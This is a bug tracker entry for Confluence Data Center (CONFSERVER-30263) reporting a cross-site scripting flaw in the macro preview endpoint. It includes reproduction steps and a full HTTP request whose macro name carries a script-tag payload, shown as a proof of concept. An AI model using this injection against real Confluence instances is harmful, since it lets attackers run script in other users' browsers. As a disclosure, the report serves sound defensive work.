Uploaded image for project: 'Confluence Data Center'
  1. Confluence Data Center
  2. CONFSERVER-30263

XSS attack in macro rendering preview

XMLWordPrintable

      Example:

      • insert lorem ipsum macro
      • edit macro in lightbox and press preview
      • alter the post request as follows:

      POST /confluence/rest/tinymce/1/macro/preview HTTP/1.1
      Host: test.foo.com
      Connection: keep-alive
      Content-Length: 136
      Accept: text/html, /; q=0.01
      Origin: https://test.foo.com
      X-Requested-With: XMLHttpRequest
      User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.31 (KHTML, like Gecko) Chrome/26.0.1410.43 Safari/537.31
      Content-Type: application/json; charset=UTF-8
      Referer: https://test.foo.com/confluence/pages/editpage.action?pageId=123456
      Accept-Encoding: gzip,deflate,sdch
      Accept-Language: de-DE,de;q=0.8,en-US;q=0.6,en;q=0.4
      Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
      Cookie: [...]

      {"contentId":"12345","macro":{"name":"lorem-ipsum<script>alert(1)</script>","body":""}}

      • an alert box pops up

      This kind of attack works for all macros available

        1. confluence-tinymce-plugin-4.3.7-CONF30263-1.jar
          1.23 MB

              alwang Alice Wang (Inactive)
              957164863928 Bernd Schaper
              Votes:
              0 Vote for this issue
              Watchers:
              5 Start watching this issue

                Created:
                Updated:
                Resolved: